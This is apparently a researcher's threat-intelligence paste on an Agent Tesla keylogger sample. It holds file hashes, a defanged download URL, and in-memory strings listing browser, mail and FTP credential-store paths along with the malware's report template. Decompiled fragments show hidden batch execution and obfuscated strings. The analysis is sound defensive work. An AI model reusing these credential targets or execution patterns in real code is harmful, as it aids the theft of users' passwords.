Neonprimetime

2018-06-26 #opendir .net #malware Agent Tesla

Jun 26th, 2018
  1. #opendir .net #malware
  2. https://myonlinesecurity.co.uk/fake-quote-po-acpmreagan-com-delivers-a-keylogger/
  3. @dvk01uk says Agent Tesla
  4.  
  5. 6/17 Quotation Order email
  6.  
  7. #opendir hxxp://ptpjm.co.id/id/
  8.  
  9. md5,82F0C02E321AC4FCE218EFDCABB4D75D
  10. Company Quotation and sales contracts.zip
  11.  
  12. md5,8EB8B220A1648A081E32C6F3DADB55D1
  13. Company Quotation and sales contracts.exe
  14.  
  15. interesting in-memory strings (mostly file paths and registry keys of browser, mail and FTP client credential stores, which fits the credential-stealing behaviour attributed to Agent Tesla; the `type=...logdata=...` template looks like the format of the data it reports back)
  16. 0x177a050 (114): \??\C:\Users\Win10\AppData\Roaming\Postbox\signons.sqlite
  17. 0x177a1d0 (118): \??\C:\Users\Win10\AppData\Roaming\Thunderbird\profiles.ini
  18. 0x1783d6c (96): HKEY_CURRENT_USERSoftwareFTPWareCOREFTPSitesUser
  19. 0x17cfcc0 (130): \??\C:\Users\Win10\AppData\Roaming\Opera Mail\Opera Mail\wand.dat
  20. 0x17d0530 (134): \??\C:\Users\Win10\AppData\Roaming\Ipswitch\WS_FTP\Sites\ws_ftp.ini
  21. 0x3671d18 (26): http://checkip.dyndns.org/
  22. 0x36c3814 (36): DynDNS-CheckIP/1.0
  23. 0x376f784 (92): C:\Users\xxx\AppData\Local\Temp\\tmpG550.tmp
  24. 0x376fc48 (20): URL:
  25. 0x376fc70 (20): Username:
  26. 0x376fc98 (20): Password:
  27. 0x376fcc0 (26): Application:
  28. 0x3774658 (142): type={0}
  29. hwid={1}
  30. time={2}
  31. pcname={3}
  32. logdata={4}
  33. screen={5}
  34. ipadd={6}
  35. webcam_link={7}
  36. screen_link={8}
  37. site_username={9}
  38. [passwords]
  39. 0x3877ec0 (38): Opera Software\Opera Stable\Login Data
  40. 0x387ba94 (156): C:\Users\xxx\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data
  41. 0x3893a20 (144): C:\Users\xxx\AppData\Roaming\Apple Computer\Preferences\keychain.plist
  42. 0x38aabd4 (116): C:\Users\xxx\AppData\Roaming\Flock\Browser\\signons3.txt
  43. 0x38bf860 (13): Torch Browser
  44. 0x38c25ac (20): UCBrowser\
  45. 0x38d41d0 (13): SMTP Password
  46. 0x38d32e4 (258): HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTP Password
  47. 0x3923b28 (72): HKEY_CURRENT_USER\Software\Paltalk\.
  48. 0x39294f0 (45): \SmartFTP\Client 2.0\Favorites\Quick Connect\
  49.  
  50.  
  51. interesting .NET code from ILSpy (decompiled fragments; `#P.#K(...)` appears to be the sample's string-decoding helper, so its base64-looking arguments are obfuscated strings rather than literal values)
  52. ---------
  53. object objectValue = RuntimeHelpers.GetObjectValue(Interaction.CreateObject("WSfcfdfdsfdsfsffffffffffffffccript.Shell", ""));
  54.  
  55. string text = Interaction.Environ(#P.#K("5g+BxFHXkdTcEM3cEGgk0A==")) + #P.#K("sscpRZTSpuugDgOvmaPPPu6b/X9gZRYeKcyavwZ3WPM=");
  56.  
  57.  
  58. string text = "%appdata%\\" + #P.#K("iXIzM98Pjl/u+zlU/h5Dfl19cMP29BJLIWFLWajNT92OKqOYE9q1PcctiVmnH8Ed") + #P.#K("#rundl343l32.exe#");
  59.  
  60. Interaction.Shell(text3 + #P.#K("#thenwfol#") + "\\" + #P.#K("#rundl343l32.exe#") + ".bat", AppWinStyle.Hide, false, -1);
  61.  
  62. File.Delete(text3 + #P.#K("#thenwfol#") + "\\qJ1rx6zo0JWv6cXezCyOGQ==.bat");
  63.  
  64. s = "美国八零会家美毒";
  65.  
  66. NewLateBinding.LateCall(instance, null, "Save", new object[0], null, null, null, true);
  67.  
  68. Process[] processesByName = Process.GetProcessesByName("qJ1rx6zo0JWv6cXezCyOGQ== ");
  69.  
  70.  
  71. string[] array2 = "ezhjOTczMzBhLTZhMTItNDM1Zi1iMTQ5LWZhOGU1ZDc4YjQ0M30sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49M2U1NjM1MDY5M2Y3MzU1ZQ==,[z]{22dae603-24dd-400a-a051-7564eef2723b},ezhjOTczMzBhLTZhMTItNDM1Zi1iMTQ5LWZhOGU1ZDc4YjQ0M30=,[z]{22dae603-24dd-400a-a051-7564eef2723b}".Split(array);
  72.  
  73.  
  74. int num = (a == "w3wp.exe") ? 1 : 0;
  75.  
  76.  
  77. string text2 = "@1B2c3D4e5F6g7H8";